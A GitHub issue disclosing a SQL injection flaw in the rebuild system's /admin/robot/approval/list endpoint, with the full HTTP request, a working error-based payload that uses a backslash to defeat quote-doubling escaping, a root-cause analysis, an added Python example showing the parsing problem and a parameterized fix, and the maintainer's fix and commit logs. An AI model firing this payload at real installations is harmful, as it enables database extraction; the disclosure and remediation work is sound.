
There is a SQL injection vulnerability in the /admin/robot/approval/list interface of the rebuild system #594

Closed
Mechoy opened this issue Mar 17, 2023 · 2 comments

Comments

@Mechoy

Mechoy commented Mar 17, 2023

Version

<=3.2.3

What's the problem

There is a SQL injection vulnerability in the /admin/robot/approval/list interface of the rebuild system.

How to reproduce this problem

Function points

[screenshot: sql1_5]

Request message for search function

GET /admin/robot/approval/list?entity=&q=1&_=1678979432278 HTTP/1.1
Host: 192.168.0.102:18080
X-AuthToken: 
Accept: */*
X-CsrfToken: 
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Referer: http://192.168.0.102:18080/admin/robot/approvals
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; JSESSIONID=78BDF749546E83FB68398994E888984E; _ga_CC8EXS9BLD=GS1.1.1678979231.2.1.1678979433.0.0.0
Connection: close

Payload

%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+

Vulnerability reproduction

[screenshot: sql1_6]

System environment (OS/MySQL/Browser etc)

MySQL 5.7.26
Windows
JDK1.8.0_341
Chrome

Suggested description

A SQL injection vulnerability exists in rebuild <=3.2.3.
Parameters are not properly validated, resulting in a SQL injection vulnerability.

Vulnerability Type

SQLi

Vendor of Product

https://github.com/getrebuild/rebuild

Affected Product Code Base

<=3.2.3

Affected Component

/admin/robot/approval/list

Attack Type

Remote

Cause of vulnerability

Interface: /admin/robot/approval/list
In the com.rebuild.web.robot.approval.ApprovalAdminController#approvalList() method, the SQL statement is created and passed into the queryListOfConfig() method.
[screenshot: sql1_1]
In the com.rebuild.web.admin.ConfigCommons#queryListOfConfig() method, the user's input is substituted into the SQL statement; at that point the escapeSql() method is called to process the user's input.
[screenshot: sql1_2]
The escapeSql() method replaces each single quotation mark in the user input with two single quotation marks.
[screenshot: sql1_3]
An attacker can get rid of the extra quotation mark by escaping it, thereby achieving SQL injection.
Then createQuery() is called directly to execute the query.
[screenshot: sql1_4]
The end, thanks!
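The root cause described in the report (a quote-doubling escape that a preceding backslash defeats under MySQL's default escaping rules) and the remediation a reviewer would ask for, as an added example that is not the project's or the reporter's code. escape_sql() mirrors the behaviour the report describes, scan_mysql_literals() is a simplified model of how MySQL reads single-quoted literals in its default sql_mode, and the table name, column names and the ? placeholder are constructed assumptions, not the project's own.

```python
"""Quote-doubling is not a safe escape for MySQL string literals.

Added example, not the project's or the reporter's code. escape_sql() mirrors
the behaviour the report describes (one ' becomes ''); scan_mysql_literals()
is a simplified model of how MySQL reads '...' literals in its default
sql_mode (backslash escapes the next character, '' is an embedded quote);
the table/column names and the ? placeholder are constructed assumptions.
"""
from typing import List, Tuple

SQL_TEMPLATE_BOUND = "select id, name from approval_config where name like ?"


def escape_sql(value: str) -> str:
    """Escape as described in the report: every ' is doubled to ''."""
    return value.replace("'", "''")


def build_query_naive(q: str) -> str:
    """Vulnerable pattern: the escaped value is spliced into the SQL text
    (constructed table and column names)."""
    return ("select id, name from approval_config where name like '%"
            + escape_sql(q) + "%'")


def scan_mysql_literals(sql: str) -> List[Tuple[int, int]]:
    """Return (open, close) offsets of each single-quoted literal in sql.

    Rules modelled (MySQL default, NO_BACKSLASH_ESCAPES off):
      - a backslash inside a literal escapes the following character;
      - two consecutive quotes inside a literal are one embedded quote.
    An unterminated literal is reported with close == len(sql).
    """
    spans: List[Tuple[int, int]] = []
    i, n = 0, len(sql)
    while i < n:
        if sql[i] != "'":
            i += 1
            continue
        start = i
        i += 1
        while i < n:
            c = sql[i]
            if c == "\\" and i + 1 < n:
                i += 2              # escaped char: still inside the literal
                continue
            if c == "'":
                if i + 1 < n and sql[i + 1] == "'":
                    i += 2          # doubled quote: still inside the literal
                    continue
                break               # closing quote
            i += 1
        spans.append((start, i))
        i += 1
    return spans


def value_stays_in_literal(q: str) -> bool:
    """Defender's self-test for the naive builder: True when the whole
    '%...%' fragment is still one literal closed by the final quote of the
    query, False when the value terminated the literal early."""
    sql = build_query_naive(q)
    spans = scan_mysql_literals(sql)
    return len(spans) == 1 and spans[0][1] == len(sql) - 1


def build_query_bound(q: str) -> Tuple[str, List[str]]:
    """Remediation: keep the SQL text constant and pass the LIKE pattern as
    a bind parameter (JDBC-style ? placeholder assumed). The driver sends the
    value separately from the statement, so no client-side escaping is
    involved and sql_mode differences no longer matter."""
    return SQL_TEMPLATE_BOUND, ["%" + q + "%"]


if __name__ == "__main__":
    # "a\'" is the report's backslash-before-quote case; the others are benign.
    for sample in ("abc", "it's", "a\\'"):
        print(repr(sample), "stays inside literal:", value_stays_in_literal(sample))
    print(build_query_bound("a\\'"))
```

The check shows why doubling quotes is fragile: with MySQL's default escaping the attacker-controlled backslash consumes the first of the two quotes, the second one closes the literal, and the remainder of the input is parsed as SQL. Binding the value removes the escaping problem entirely, which is why a parameterized query, not a stronger escape function, is the fix to look for in the patch.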

devezhao pushed a commit that referenced this issue Mar 17, 2023
@getrebuild
Owner

getrebuild commented Mar 17, 2023

We have fixed it, thanks for the report!

@Mechoy
Author

Mechoy commented Mar 18, 2023

Thank you for your quick response and fixing the issue!

@Mechoy Mechoy closed this as completed Mar 18, 2023
getrebuild added a commit that referenced this issue Mar 18, 2023
* style: directory styles gh

* style: J_new

* feat: advListFilterTabs

* feat: nav-copyto

* enh: full pinyin for mnemonic codes

* enh: map search point selection

* enh: topnav

* list pn

* .form-line.v33

* open TAG

* KVS addShutdownHook

* fix: #594

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>
getrebuild added a commit that referenced this issue May 5, 2023
* Enh charts (#575)

* NN

* feat: LINE/BAR 2dim and dateContinuous

---------

Co-authored-by: RB <getrebuild@sina.com>

* Copy role (#576)

* feat: showAllUsers

* feat: role copy

* bg-guide

---------

Co-authored-by: RB <getrebuild@sina.com>

* base support (#579)

* Excel pdf (#581)

* Bump lib

* excel to pdf

* PdfConverter


---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Files access (#582)


* code style

* se:conf

* feat: folder rights

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Showfields spec (#584)

* field CLASSIFICATION dv

* feat: SYS for DataList

* view > details

* Trigger async (#585)

* synchronous sending

* Update @rbv

---------

Co-authored-by: RB <getrebuild@sina.com>

* N2n aggregation (#587)

* list view

* bump

* better delete


* Update @rbv

* star userid

* fieldVarsN2NPath

* USER_OWNS No warn

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Single field after reload (#589)

* v3.3 compact

* singleField reload

* .col-right-compact


---------

Co-authored-by: RB <getrebuild@sina.com>

* List styles (#590)

* quick-filter-pane v3

* dock page

* better

* H5 sync (#593)

* Update submail.html

* better files

* Update @rbv

* H5 sync2 (#595)

* style: directory styles gh

* style: J_new

* feat: advListFilterTabs

* feat: nav-copyto

* enh: full pinyin for mnemonic codes

* enh: map search point selection

* enh: topnav

* list pn

* .form-line.v33

* open TAG

* KVS addShutdownHook

* fix: #594

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Fix long request (#599)

* fix: `trigger/exec-manual` async

* fix: lang

* fix: #596

* open: detailsNotEmpty (#600)

* open: detailsNotEmpty

* enh: template preview

* protable tipping

* be: form-design

* be: file upload noname

* style: better

* be: NTEXT \n

---------

Co-authored-by: RB <getrebuild@sina.com>

* List topnav (#601)

* setHidden

* enh: THROTTLED_QUEUE

* enh: PageTokenVerify 2h

* fix: Mix N2N & styles

* feat: form backfill source field supports second-level fields

* be: showStartGuide

* fix: spec label

* fix: chart scale

* fix: file copy

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Trigger fa n2n (#602)

* style

* Update entities-sheet.html

* be: N2N in FieldWriteback

* feat: fa target field supports N2N NTEXT

* Update trigger.FIELDAGGREGATION.js

* be

* Update LogFunction.java

* be: save tips

* transform-design

* be: meta-name trim

* enh: show import speed

* Project view (#603)

* relaxed-path-chars

* be: style

* feat: LiteForm, setNullable, setTip

* be: forms include

* Update @rbv

* style: line breaks

* enh: customized

* style: dialog footer

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Excel use refs (#605)

* template v33

* be: schema timeout

* DataList renderAfter

* enh: whenUpdateFields

* be: RbAlter hide force

* Update @rbv

* fix: useValueOfVarRecord

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* import for users (#608)

* fix: template v33

* feat: clearFields

* be: login btn

* enh: direct printing

* fix: textCommon overflow

* be: J_decimalTypeFlag

* be: styles & ID

* AssertFailedException

* be: aviator func

* FieldWritebackRefresh

* SSS

* be: RecordBuilder

* classification-editor

* Update ClassificationFileImporter.java

* be: target record DELETED

* Update BarCodeSupport.java

* feat: N selected

* imports for users

* be: barcode w/h

* Update DataImportController.java

* be: TopNav

* open: textCommon

* feat: EnableBizzPart

* text $separator

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>

* Better v3.3 (#610)

* be: style

* 3.3.0-beta1

* be

---------

Co-authored-by: devezhao <zhaofang123@gmail.com>